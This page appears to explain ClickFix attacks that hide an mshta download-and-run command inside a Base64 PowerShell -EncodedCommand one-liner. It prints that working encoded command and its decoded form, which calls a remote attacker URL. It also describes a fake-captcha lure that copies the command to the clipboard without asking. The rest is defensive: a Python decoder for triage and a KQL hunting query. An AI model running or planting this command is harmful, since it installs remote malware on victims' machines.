Clickfix Encoded

PowerShell -EncodedCommand hides the payload in Base64. What you see in logs is opaque. What actually runs is revealed only when decoded.

This command runs on Windows
Example Command breakdown
Two views: as seen in the wild (encoded), and decoded to reveal the payload.

As seen (encoded)

powershell.exe -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AZwBlAHQAeQBvAHUAcgBwAGEAZwBlAHMALgBjAG8AbQAvAGQAbwB3AG4AbABvAGEAZABzAC8AYgByAHYAIgA=

  1. PowerShell (powershell.exe)

    Invokes Windows PowerShell. The payload is hidden in the following encoded string.

  2. EncodedCommand (-eC)

    Short for -EncodedCommand. Accepts a Base64-encoded UTF-16LE string. PowerShell decodes and executes it.

  3. Base64 payload

    The actual command, encoded. Static analysis and signatures cannot see the payload. Decode to reveal.

    bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AZwBlAHQAeQBvAHUAcgBwAGEAZwBlAHMALgBjAG8AbQAvAGQAbwB3AG4AbABvAGEAZABzAC8AYgByAHYAIgA=

Decoded

mshta "https://getyourpages.com/downloads/brv"

  1. HTA host (mshta)

    Built-in Windows binary that runs the downloaded HTA from the URL.

  2. Remote HTA URL ("https://getyourpages.com/downloads/brv")

    Attacker-controlled URL. The HTA contains VBScript/JScript that can run further payloads.
How it works
The attack chain from victim execution to payload delivery
  1. Victim runs the encoded command

    The page copies the powershell.exe -eC one-liner. The Base64 blob hides the real payload. Victim pastes via Win+R, Ctrl+V, Enter.

  2. PowerShell decodes and executes

    -EncodedCommand decodes the Base64 (UTF-16LE) and runs it. The decoded command is mshta "https://...", which fetches and executes the remote HTA.

Implications
Why encoding is used and how it hinders defenders
  • Opaque to static analysis. Logs and process monitors show only Base64. No URL, no mshta, no obvious IOCs in the command line.
  • Signature bypass. String-based rules that look for mshta, http, or known URLs will not match the encoded form.
  • Same clickfix flow. Fake captcha, clipboard copy, Win+R, Ctrl+V, Enter. The only difference is the command format.
  • Hunt for -EncodedCommand. Defenders can look for powershell.exe with -e or -EncodedCommand and base64-like command lines. Decode at scale for analysis.
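As an added example (not code from this page or its demo), a Python triage helper for the "decode at scale" step: it pulls the -EncodedCommand argument out of a process command line, accepting the abbreviated flag forms PowerShell allows (such as the -eC seen above), Base64-decodes it as UTF-16LE, and flags decoded scripts that invoke mshta or fetch a URL. The sample command lines are constructed; the first is the encoded one-liner from this page, the second a benign scheduled-task style invocation.

```python
import base64
import binascii
import re

# Constructed samples: this page's encoded one-liner and a benign command line.
SAMPLE_COMMAND_LINES = [
    'powershell.exe -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AZwBlAHQAeQBvAHUAcgBwAGEAZwBlAHMALgBjAG8AbQAvAGQAbwB3AG4AbABvAGEAZABzAC8AYgByAHYAIgA=',
    'powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1',
]

# PowerShell accepts -EncodedCommand or any unambiguous prefix: -e, -ec, -enc, -encoded, ...
# A literal search for "-e " or "-EncodedCommand" therefore misses "-eC".
ENCODED_FLAG = re.compile(r"^[-/]e(c|nc[a-z]*)?$", re.IGNORECASE)

# Once the payload is readable, flag common download/execute primitives and URLs.
SUSPICIOUS = re.compile(
    r"\b(mshta|certutil|bitsadmin|curl|iwr|invoke-webrequest)\b|https?://",
    re.IGNORECASE,
)


def decode_encoded_command(command_line: str):
    """Return the decoded script if the command line carries an encoded payload, else None.

    Invalid Base64 or a non-UTF-16LE payload (odd byte count, bad surrogates) also yields None,
    so a malformed blob never crashes a bulk decode run.
    """
    tokens = command_line.split()
    for flag, value in zip(tokens, tokens[1:]):
        if not ENCODED_FLAG.match(flag):
            continue
        try:
            raw = base64.b64decode(value, validate=True)
            return raw.decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            return None
    return None


def triage(command_line: str) -> dict:
    """Summarise one command line: was it encoded, what it decodes to, and whether it looks suspicious."""
    decoded = decode_encoded_command(command_line)
    return {
        "encoded": decoded is not None,
        "decoded": decoded,
        "suspicious": bool(decoded and SUSPICIOUS.search(decoded)),
    }


if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        print(triage(line))
```

Feed it the ProcessCommandLine column exported from the hunting query to turn opaque Base64 into reviewable commands in bulk.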
Interactive demo
Experience the clickfix flow: a fake security check prompts you to run the encoded command via Win+R, Ctrl+V, Enter.

Note: The command is copied to your clipboard in the background when you click verify, with no prompt and no explicit user interaction. This is how real clickfix attacks work.
Hunting
Detection queries for PowerShell -EncodedCommand
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("powershell.exe", "pwsh.exe")
// PowerShell accepts -EncodedCommand or any unambiguous prefix (-e, -ec, -enc, ...), so a literal
// "-e " or "-EncodedCommand" match misses the -eC form above; match the flag family plus a Base64-looking argument.
| where ProcessCommandLine matches regex @"(?i)\s[-/]e(c|nc[a-z]*)?\s+[A-Za-z0-9+/]{16,}={0,2}"
| project Timestamp, DeviceName, AccountName, ProcessCommandLine